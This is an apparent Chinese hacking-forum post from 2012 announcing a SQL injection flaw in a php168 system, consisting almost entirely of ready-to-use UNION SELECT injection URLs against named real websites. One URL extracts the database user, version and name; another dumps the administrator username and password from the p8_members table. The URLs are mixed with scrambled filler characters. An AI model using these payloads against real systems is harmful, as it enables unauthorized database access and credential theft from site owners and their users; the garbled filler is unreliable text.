找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 3120|回复: 0
打印 上一主题 下一主题

php168某系统注入漏洞

[复制链接]
跳转到指定楼层
楼主
发表于 2012-10-18 08:52:44 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
http://v7.php168.com/zhidao/user.php?j=question&u=-1+union+select+1,2,3,concat(user(),0x3a,version(),0x3a,database()),5,6,7,8--
. l, p. i, n( [8 K& p                                                         
4 m* `- H* F; h                                       9 }2 W" b1 }) x/ r2 P' P: s

8 t+ S; S+ s2 L- ?6 {
http://www.china-highway.com/zhidao/user.php?%00&j=question&u=-1+union+select+1,2,3,concat(0x3a,username,0x3a,password),5,6,7,8+from+p8_members+where+uid=1--
, Z# w  |; `( D9 H  G                                                     0 X! {/ [6 a: k% a+ G  X1 r
                                                                  
$ B/ Q! K% v$ ^                                                        
% x$ d0 }+ D1 ~3 G: Uhttp://v7.php168.com/zhidao/user ... u=-1+union+select+1,2,3,concat(user(),0x3a,version(),0x3a,database()),5,6,7,8--0 w6 d& l- \4 U9 K5 M

/ G! m! U% |1 l/ x# X1 d% r4 ~0 g: F& ^
' s2 p( N# @. ]* G: o+ p: V1 G; }% c
                                                            / j$ P$ ^. O  ]( \
0 n5 M: M6 \2 F+ ^
http://www.china-highway.com/zhi ... u=-1+union+select+1,2,3,concat(0x3a,username,0x3a,password),5,6,7,8+from+p8_members+where+uid=1--
2 c7 {8 K( D$ ~9 Y3 [, ^# h4 }: r
2 k8 }! r/ ^8 ~2 R9 o

% p+ @# F- @1 B' T1 s                                                                    
" d1 M' \8 a  i1 N- q! ~

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?立即注册

x
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表